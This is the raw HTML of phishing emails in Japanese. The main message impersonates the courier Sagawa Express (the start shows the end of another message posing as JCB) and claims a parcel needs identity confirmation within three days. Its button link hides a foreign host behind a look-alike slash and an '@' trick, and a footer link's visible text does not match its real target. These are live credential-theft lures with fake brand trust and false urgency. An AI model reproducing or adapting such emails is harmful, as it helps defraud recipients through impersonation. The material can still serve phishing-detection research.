お心当たりのない場合:<br>
<strong>security@jcb.co.jp</strong>
</p>
<p style="margin:0;">© 2025 JCB株式会社. All Rights Reserved</p>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
__お荷物配送予定のお知らせ
<HTML lang=ja><HEAD><TITLE>佐川急便 - 配達確認通知</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f2f4f8; font-family:"Meiryo",sans-serif; color:#1f1f1f; font-size:15px; line-height:1.8; }
.outer-wrap { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.05); }
.header-line { background:#0055a4; color:#fff; text-align:center; padding:18px 24px; font-size:16px; font-weight:bold; }
.info-bar { background:#e5effa; color:#004080; font-size:13px; padding:12px 24px; border-bottom:1px solid #bfd8ee; }
.main-box { padding:28px 30px; }
.main-box p { margin-bottom:18px; }
.confirm-block { background:#f1f7ff; border-left:5px solid #0055a4; padding:14px 18px; margin:22px 0; font-weight:bold; border-radius:5px; font-size:14px; color:#003366; }
.cta-area { text-align:center; margin:30px 0; }
.cta-button { display:inline-block; background:#0057c0; padding:14px 36px; color:#fff; border-radius:999px; text-decoration:none; font-weight:bold; font-size:14px; }
.cta-button:hover { background:#003f87; }
.details-zone { background:#f8fafd; padding:22px 28px; font-size:13px; color:#333; border-top:1px solid #d6e0eb; }
.details-zone strong { color:#0055a4; }
.footer-block { font-size:12px; color:#666; text-align:center; background:#f4f5f7; padding:18px; border-top:1px solid #ccc; line-height:1.6; }
.footer-block a { color:#0055a4; text-decoration:none; }
@media screen and (max-width: 600px) {
.main-box, .details-zone { padding:18px 14px; }
.cta-button { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>
</HEAD>
<BODY><SECTION class=outer-wrap>
<DIV class=header-line>【重要】佐川急便 - 配達確認のお願い</DIV>
<DIV
class=info-bar>配達確認番号:SG-2026-01-22-46714 / お客様ID:8508</DIV>
<DIV class=main-box>
<P>お客様各位</P>
<P>いつも佐川急便をご利用いただき誠にありがとうございます。</P>
<P style="animation-play-state:paused;">現在、お荷物の配達に関してご本人様確認が必要となっております。</P>
<DIV class=confirm-block>■ ご本人様確認のお願い<BR>セキュリティ対策のため、以下のリンクよりご確認手続きをお願いいたします。
</DIV></DIV>
<DIV class=cta-area><A class=cta-button
href="https://rakutenrhqcx.com∕oedsok@xybnwiq.cn"
target=_blank>本人確認ページへ進む</A> </DIV>
<DIV class=details-zone><STRONG>■
ご確認期限</STRONG><BR>本メール受信後3日以内にお手続きをお願いいたします。<BR>期限を過ぎた場合、配達が一時的に保留される可能性がございます。<BR><BR><STRONG>■
お問い合わせ先</STRONG><BR>佐川急便
カスタマーサービスセンター<BR>TEL:0120-555-8957(受付時間:9:00〜18:00) </DIV>
<DIV class=footer-block>※本メールは送信専用です。返信には対応いたしかねます。<BR>詳細は公式サイトをご覧ください:<BR><A
href="https://www.yebeerkzku.co.jp"
target=_blank>https://www.djxwmahupf.co.jp</A><BR><BR>© 2025 Sagawa
Express Co., Ltd. All rights reserved. </DIV></SECTION></BODY></HTML>